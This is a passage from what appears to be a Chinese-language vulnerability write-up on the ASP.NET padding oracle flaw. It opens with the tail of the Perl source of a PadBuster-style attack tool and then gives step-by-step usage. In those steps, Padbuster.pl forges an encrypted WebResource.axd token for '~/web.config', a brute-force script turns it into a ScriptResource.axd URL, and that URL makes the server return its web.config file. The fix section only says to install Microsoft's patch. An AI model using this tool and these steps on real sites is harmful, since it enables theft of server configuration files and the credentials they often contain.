   $noConnect = 0;
   $totalRequests++;
  }  
 } until (($noConnect == 0) || ($numRetries >= 15));
 if ($numRetries >= 15) {
  &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
  exit;
 }
 return ($status, $content, $location, $contentLength);
}
 
sub myPrint {
 my ($printData, $printLevel) = @_;
 $printData .= "\n";
 if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
  print $printData;
  &writeFile("ActivityLog.txt",$printData);
 }
}
 
sub myEncode {
 my ($toEncode, $format) = @_;
 return &encodeDecode($toEncode, 0, $format);
}
 
sub myDecode {
 my ($toDecode, $format) = @_;
 return &encodeDecode($toDecode, 1, $format);
}
 
sub encodeDecode {
 my ($toEncodeDecode, $oper, $format) = @_;
 # Oper: 0=Encode, 1=Decode
 # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
 my $returnVal = "";
 if ($format == 1 || $format == 2) {
   # HEX
   if ($oper == 1) {
   	#Decode
   	#Always convert to lower when decoding)
   	$toEncodeDecode = lc($toEncodeDecode);
	$returnVal = pack("H*",$toEncodeDecode);
   } else {
   	#Encode
	$returnVal = unpack("H*",$toEncodeDecode);
	if ($format == 2) {
	   	#Uppercase
		$returnVal = uc($returnVal)
   	}
   }
 } elsif ($format == 3) {
   # NetUrlToken
   if ($oper == 1) {
	$returnVal = &web64Decode($toEncodeDecode,1);
   } else {
	$returnVal = &web64Encode($toEncodeDecode,1);
   } 
 } elsif ($format == 4) {
    # Web64
    if ($oper == 1) {
 	$returnVal = &web64Decode($toEncodeDecode,0);
    } else {
 	$returnVal = &web64Encode($toEncodeDecode,0);
    } 
 } else {
    # B64
    if ($oper == 1) {
 	$returnVal = &decode_base64($toEncodeDecode);
    } else {
 	$returnVal = &encode_base64($toEncodeDecode);
 	$returnVal =~ s/(\r|\n)//g;	
    }
 }
 
 return $returnVal;
}
 
 
sub web64Encode {
 my ($input, $net) = @_;
 # net: 0=No Padding Number, 1=Padding (NetUrlToken)
 $input = &encode_base64($input);
 $input =~ s/(\r|\n)//g;
 $input =~ s/\+/\-/g;
 $input =~ s/\//\_/g;
 my $count = $input =~ s/\=//g;
 $count = 0 if ($count eq "");
 $input.=$count if ($net == 1);
 return $input;
}
 
sub web64Decode {
 my ($input, $net) = @_;
 # net: 0=No Padding Number, 1=Padding (NetUrlToken)
 $input =~ s/\-/\+/g;
 $input =~ s/\_/\//g;
 if ($net == 1) {
  my $count = chop($input);
  $input = $input.("=" x int($count));
 }
 return &decode_base64($input);
}
 
 
sub promptUser {
 my($prompt, $default, $yn) = @_;
 my $defaultValue = $default ? "[$default]" : "";
 print "$prompt $defaultValue: ";
 chomp(my $input = <STDIN>);
 
 $input = $input ? $input : $default;
 if ($yn) {
  if ($input =~ /^y|n|a$/) {
   return $input;
  } else {
   &promptUser($prompt, $default, $yn);
  }
 } else {
  if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
   return $input;
  } else {
   &promptUser($prompt, $default);
  }
 }
}
 
sub writeFile {
 my ($fileName, $fileContent) = @_;
 if ($logFiles) {
  if ($dirExists != 1) {
   system($dirCmd." ".$dirName);
   $dirExists = 1;
  }
  $fileName = $dirName.$dirSlash.$fileName;
  open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
  print $OUTFILE $fileContent;
  close($OUTFILE);
 }
}
 
sub getTime { 
 my ($format) = @_;
 my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time);
 my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
 my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
 $month=sprintf("%02d",$month);
 $day=sprintf("%02d",$day);
 $hour=sprintf("%02d",$hour);
 $minute=sprintf("%02d",$minute);
 $second=sprintf("%02d", $second);
 $year =~ s/^.//;
 if ($format eq "F") {
  return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
 } elsif ($format eq "S") {
  return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
 } else {
  return $hour.":".$minute.":".$second;
 }
}

使用方法

Padbuster.pl http://www.xxx.com/WebResource.axd?d=XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX 16 -encoding 3 -plaintext "|||~/web.config"

XXXXXXXXXXXXXXXX是http://www.xxx.com/WebResource.axd?d=XXXXXXXXXXXXXXXX中参数d的值。 16为每个数据块的字节数,分为8和16。encoding参数有4种,分别是0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64。plaintext为想读取内容的文件,本次这里以web.config为例。之后按程序提示进行操作。若网站存在padding oracle漏洞,最终将返回web.config的URL的加密地址。

Webconfig Bruter.pl http://www.xxx.com/ScriptResource.axd XXXXXXXXXXXXXXXXXX 16

XXXXXXXXXXXXXXXXXX为Padbuster.pl得到的加密地址。

访问

http://www.xxx91ri.org/ScriptResource.axd?d=XXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXX为Webconfig Bruter.pl得到的加密地址。服务器会返回目标文件的内容(此处为web.config文件)。

4、实际案例

5、漏洞修复


安装微软官方补丁。

6、相关资源